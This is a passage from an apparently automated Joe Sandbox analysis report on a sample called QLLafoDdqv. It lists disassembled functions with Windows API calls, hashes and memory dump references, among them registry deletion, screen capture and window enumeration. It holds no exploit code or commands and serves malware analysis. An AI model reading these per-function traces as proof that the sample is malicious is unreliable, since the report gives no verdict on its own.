              • Opcode Fuzzy Hash: d3eaba74513dce57d48ef928219fc7d48b4ce0d210665a889e09e64584309048
              • Instruction Fuzzy Hash: F9518EB1501308BFDB629F65C948ABBBBFCFF08344F108419F98696210DB78E914DB60
              Function 0076856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00768592
              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007685A2
              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007685AD
              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007685BA
              • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007685C8
              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007685D7
              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007685E0
              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007685E7
              • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007685F8
              • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0076FC38,?), ref: 00768611
              • GlobalFree.KERNEL32(00000000), ref: 00768621
              • GetObjectW.GDI32(?,00000018,?), ref: 00768641
              • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00768671
              • DeleteObject.GDI32(?), ref: 00768699
              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007686AF
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
              • String ID:
              • API String ID: 3840717409-0
              • Opcode ID: eb3c30d5affcfa0ccd82823cd27a89650dc7dd919516fa932f8fecbc162b5ce3
              • Instruction ID: 5ebb3cbf9c5c1b90859c4d049f1c11b3e252c764ba5b04a3f02b637f2a98c6dd
              • Opcode Fuzzy Hash: eb3c30d5affcfa0ccd82823cd27a89650dc7dd919516fa932f8fecbc162b5ce3
              • Instruction Fuzzy Hash: A8412875600208AFDB129FA5CC48EAA7BB8FF89B11F108159FD46E7261DB789D01CF25
              Function 007414BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
              Download Yara Rule
              APIs
              • VariantInit.OLEAUT32(00000000), ref: 00741502
              • VariantCopy.OLEAUT32(?,?), ref: 0074150B
              • VariantClear.OLEAUT32(?), ref: 00741517
              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007415FB
              • VarR8FromDec.OLEAUT32(?,?), ref: 00741657
              • VariantInit.OLEAUT32(?), ref: 00741708
              • SysFreeString.OLEAUT32(?), ref: 0074178C
              • VariantClear.OLEAUT32(?), ref: 007417D8
              • VariantClear.OLEAUT32(?), ref: 007417E7
              • VariantInit.OLEAUT32(00000000), ref: 00741823
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
              • String ID: %4d%02d%02d%02d%02d%02d$Default
              • API String ID: 1234038744-3931177956
              • Opcode ID: 05228d4c3f8b1cc9573b3d7f44bef767aa7c55e9fb1e4406a7e8f8bc1c33183b
              • Instruction ID: 5e126d131e37f5975fa5dc322948794febb279cdd899d2c5552e4875c3c40ff9
              • Opcode Fuzzy Hash: 05228d4c3f8b1cc9573b3d7f44bef767aa7c55e9fb1e4406a7e8f8bc1c33183b
              • Instruction Fuzzy Hash: 4DD1E271A00219DBDB00FF65D885BB9FBB6BF44700F54815AF446AB280DB38EC91DBA1
              Function 0075B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
                • Part of subcall function 0075C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0075B6AE,?,?), ref: 0075C9B5
                • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075C9F1
                • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075CA68
                • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075CA9E
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0075B6F4
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0075B772
              • RegDeleteValueW.ADVAPI32(?,?), ref: 0075B80A
              • RegCloseKey.ADVAPI32(?), ref: 0075B87E
              • RegCloseKey.ADVAPI32(?), ref: 0075B89C
              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0075B8F2
              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0075B904
              • RegDeleteKeyW.ADVAPI32(?,?), ref: 0075B922
              • FreeLibrary.KERNEL32(00000000), ref: 0075B983
              • RegCloseKey.ADVAPI32(00000000), ref: 0075B994
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
              • String ID: RegDeleteKeyExW$advapi32.dll
              • API String ID: 146587525-4033151799
              • Opcode ID: ce366675221b07dc4a002bc98296aed2713ea70288fc0038b65e222dd3ddce04
              • Instruction ID: da68f1e1edd1ca2d0e375a5f745c1c7fdb33612ca775d12da4eda411db99b46f
              • Opcode Fuzzy Hash: ce366675221b07dc4a002bc98296aed2713ea70288fc0038b65e222dd3ddce04
              • Instruction Fuzzy Hash: 5FC16C30604201EFD714DF14C495F6ABBE5AF84319F14859DF89A8B3A2CBB9EC49CB91
              Function 0075255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
              Download Yara Rule
              APIs
              • GetDC.USER32(00000000), ref: 007525D8
              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 007525E8
              • CreateCompatibleDC.GDI32(?), ref: 007525F4
              • SelectObject.GDI32(00000000,?), ref: 00752601
              • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0075266D
              • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 007526AC
              • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 007526D0
              • SelectObject.GDI32(?,?), ref: 007526D8
              • DeleteObject.GDI32(?), ref: 007526E1
              • DeleteDC.GDI32(?), ref: 007526E8
              • ReleaseDC.USER32(00000000,?), ref: 007526F3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
              • String ID: (
              • API String ID: 2598888154-3887548279
              • Opcode ID: abad569c0cb73a36f770cd24593051f5ec5fc02a5c28297c7d747c7ca9050734
              • Instruction ID: 339b68b6ccc4e8b2b747b313eb488de7da2ea882d66853ce70fb172437d29f44
              • Opcode Fuzzy Hash: abad569c0cb73a36f770cd24593051f5ec5fc02a5c28297c7d747c7ca9050734
              • Instruction Fuzzy Hash: FA6105B5D00219EFCF05CFA4D884AAEBBF5FF48310F208529E956A7251E7B4A941CF94
              Function 0070DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • ___free_lconv_mon.LIBCMT ref: 0070DAA1
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D659
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D66B
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D67D
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D68F
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D6A1
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D6B3
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D6C5
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D6D7
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D6E9
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D6FB
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D70D
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D71F
                • Part of subcall function 0070D63C: _free.LIBCMT ref: 0070D731
              • _free.LIBCMT ref: 0070DA96
                • Part of subcall function 007029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000), ref: 007029DE
                • Part of subcall function 007029C8: GetLastError.KERNEL32(00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000,00000000), ref: 007029F0
              • _free.LIBCMT ref: 0070DAB8
              • _free.LIBCMT ref: 0070DACD
              • _free.LIBCMT ref: 0070DAD8
              • _free.LIBCMT ref: 0070DAFA
              • _free.LIBCMT ref: 0070DB0D
              • _free.LIBCMT ref: 0070DB1B
              • _free.LIBCMT ref: 0070DB26
              • _free.LIBCMT ref: 0070DB5E
              • _free.LIBCMT ref: 0070DB65
              • _free.LIBCMT ref: 0070DB82
              • _free.LIBCMT ref: 0070DB9A
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
              • String ID:
              • API String ID: 161543041-0
              • Opcode ID: 0b50f2e46493ae6a8fa6652d446d4f72f3fbf7efdec349bbdef2f80f4d200b3d
              • Instruction ID: 6018ebed41e9d267bea4c28b79fa41bbac574d83e224d63c9a569dc357b537f2
              • Opcode Fuzzy Hash: 0b50f2e46493ae6a8fa6652d446d4f72f3fbf7efdec349bbdef2f80f4d200b3d
              • Instruction Fuzzy Hash: B0313BB2604305DFEB31AAB9E849B5677E9FF00310F254629E449E71E2DB79BC41CB20
              Function 0073365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
              Download Yara Rule
              APIs
              • GetClassNameW.USER32(?,?,00000100), ref: 0073369C
              • _wcslen.LIBCMT ref: 007336A7
              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00733797
              • GetClassNameW.USER32(?,?,00000400), ref: 0073380C
              • GetDlgCtrlID.USER32(?), ref: 0073385D
              • GetWindowRect.USER32(?,?), ref: 00733882
              • GetParent.USER32(?), ref: 007338A0
              • ScreenToClient.USER32(00000000), ref: 007338A7
              • GetClassNameW.USER32(?,?,00000100), ref: 00733921
              • GetWindowTextW.USER32(?,?,00000400), ref: 0073395D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
              • String ID: %s%u
              • API String ID: 4010501982-679674701
              • Opcode ID: 5b86906b69c6d471b1fb5825197008676316b16e2cc47cdb9842836720eeaff3
              • Instruction ID: 77a44cab104a3df3e87f57f2509f6c521f3c2253fe6fecfc8bcadcfbe7e3cc6a
              • Opcode Fuzzy Hash: 5b86906b69c6d471b1fb5825197008676316b16e2cc47cdb9842836720eeaff3
              • Instruction Fuzzy Hash: FC91B371204706EFE725DF24C885BEAF7A9FF44314F008619FA9AC2151DB78EA45CBA1
              Function 00734954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
              Download Yara Rule
              APIs
              • GetClassNameW.USER32(?,?,00000400), ref: 00734994
              • GetWindowTextW.USER32(?,?,00000400), ref: 007349DA
              • _wcslen.LIBCMT ref: 007349EB
              • CharUpperBuffW.USER32(?,00000000), ref: 007349F7
              • _wcsstr.LIBVCRUNTIME ref: 00734A2C
              • GetClassNameW.USER32(00000018,?,00000400), ref: 00734A64
              • GetWindowTextW.USER32(?,?,00000400), ref: 00734A9D
              • GetClassNameW.USER32(00000018,?,00000400), ref: 00734AE6
              • GetClassNameW.USER32(?,?,00000400), ref: 00734B20
              • GetWindowRect.USER32(?,?), ref: 00734B8B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
              • String ID: ThumbnailClass
              • API String ID: 1311036022-1241985126
              • Opcode ID: cc00528501475ab3f434850dab90e39b297c74276aaec789c25e82aa852bc4cc
              • Instruction ID: 3fb23d8e35cc4b88847fddd582befdc8fbffc90a06de1bce9d5188855df0817b
              • Opcode Fuzzy Hash: cc00528501475ab3f434850dab90e39b297c74276aaec789c25e82aa852bc4cc
              • Instruction Fuzzy Hash: 8691DE711042099FEB08CF14C985BBAB7E9FF84314F04846AFD869A196DB38FD45CBA5
              Function 00768D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006E9BB2
              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00768D5A
              • GetFocus.USER32 ref: 00768D6A
              • GetDlgCtrlID.USER32(00000000), ref: 00768D75
              • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00768E1D
              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00768ECF
              • GetMenuItemCount.USER32(?), ref: 00768EEC
              • GetMenuItemID.USER32(?,00000000), ref: 00768EFC
              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00768F2E
              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00768F70
              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00768FA1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
              • String ID: 0
              • API String ID: 1026556194-4108050209
              • Opcode ID: 8c8cbf347b941b88231d126bbd9b83732bd78a06c42b3505112ba236e9a40a27
              • Instruction ID: 10a2a4f5845e8c3d90b36a96496ba7b2a45b6c59256668b71782eab77808b2e2
              • Opcode Fuzzy Hash: 8c8cbf347b941b88231d126bbd9b83732bd78a06c42b3505112ba236e9a40a27
              • Instruction Fuzzy Hash: 8F81E071508301AFDB50CF24C884AAB7BE9FF88314F144A1DFD9697291DB79E904CB66
              Function 0075CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
              Download Yara Rule
              APIs
              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0075CC64
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0075CC8D
              • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0075CD48
                • Part of subcall function 0075CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0075CCAA
                • Part of subcall function 0075CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0075CCBD
                • Part of subcall function 0075CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0075CCCF
                • Part of subcall function 0075CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0075CD05
                • Part of subcall function 0075CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0075CD28
              • RegDeleteKeyW.ADVAPI32(?,?), ref: 0075CCF3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
              • String ID: RegDeleteKeyExW$advapi32.dll
              • API String ID: 2734957052-4033151799
              • Opcode ID: 57230b7916e5c44c7b99b1be2f0fb1987dc9807ef0004c05555a77df9ebdcab5
              • Instruction ID: b8ba0860d2586482295cdb6391ca90cd043205d7a179a3e936eb068bd3f112d6
              • Opcode Fuzzy Hash: 57230b7916e5c44c7b99b1be2f0fb1987dc9807ef0004c05555a77df9ebdcab5
              • Instruction Fuzzy Hash: AF3170B1A01318BFDB229B90DC88EFFBB7CEF05741F004165E906E6140D6B89E49DAB4
              Function 0073E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
              Download Yara Rule
              APIs
              • timeGetTime.WINMM ref: 0073E6B4
                • Part of subcall function 006EE551: timeGetTime.WINMM(?,?,0073E6D4), ref: 006EE555
              • Sleep.KERNEL32(0000000A), ref: 0073E6E1
              • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0073E705
              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0073E727
              • SetActiveWindow.USER32 ref: 0073E746
              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0073E754
              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0073E773
              • Sleep.KERNEL32(000000FA), ref: 0073E77E
              • IsWindow.USER32 ref: 0073E78A
              • EndDialog.USER32(00000000), ref: 0073E79B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
              • String ID: BUTTON
              • API String ID: 1194449130-3405671355
              • Opcode ID: fc667f9e1056235d70f9d9d2e829fa35b1041ac5780bf39ff9e35c545dc4f876
              • Instruction ID: 45b46c6be4eaf3b4137bb4aeeb3ae404af5ceccf8a5c06e72832753c35833b95
              • Opcode Fuzzy Hash: fc667f9e1056235d70f9d9d2e829fa35b1041ac5780bf39ff9e35c545dc4f876
              • Instruction Fuzzy Hash: 0D2184B0241305EFFB125F64EC99A353B69F796348F108425F55682AE3DBBD9C118B2C
              Function 0073E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0073EA5D
              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0073EA73
              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0073EA84
              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0073EA96
              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0073EAA7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: SendString$_wcslen
              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
              • API String ID: 2420728520-1007645807
              • Opcode ID: 7bf90f6dafb71b8cf3497a45f062c5af8be2aaa790c8b2f9799816e7afe02a1a
              • Instruction ID: 8c738fe0caa5d1a88ce1add17fe38ff80b08772ae4c49754e8bac7581892db83
              • Opcode Fuzzy Hash: 7bf90f6dafb71b8cf3497a45f062c5af8be2aaa790c8b2f9799816e7afe02a1a
              • Instruction Fuzzy Hash: C6117371A5026979EB20A7A2EC4AEFF6B7CEBD1F50F00452EB401A21D1EEB45D05C5B0
              Function 006E8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006E8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006E8BE8,?,00000000,?,?,?,?,006E8BBA,00000000,?), ref: 006E8FC5
              • DestroyWindow.USER32(?), ref: 006E8C81
              • KillTimer.USER32(00000000,?,?,?,?,006E8BBA,00000000,?), ref: 006E8D1B
              • DestroyAcceleratorTable.USER32(00000000), ref: 00726973
              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,006E8BBA,00000000,?), ref: 007269A1
              • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,006E8BBA,00000000,?), ref: 007269B8
              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,006E8BBA,00000000), ref: 007269D4
              • DeleteObject.GDI32(00000000), ref: 007269E6
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
              • String ID:
              • API String ID: 641708696-0
              • Opcode ID: 4bb26aec956ead845dbad22fb697a3635e9652425212de7769618bfd86d23a28
              • Instruction ID: c532157a4ffe608edce663264216bfb64cc7f2faa5811376aa32e0b3253d1f69
              • Opcode Fuzzy Hash: 4bb26aec956ead845dbad22fb697a3635e9652425212de7769618bfd86d23a28
              • Instruction Fuzzy Hash: E861AF30003790DFDB229F16D94872677F2FB82712F64851DE0869B660CB79B981CF98
              Function 006E9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006E9944: GetWindowLongW.USER32(?,000000EB), ref: 006E9952
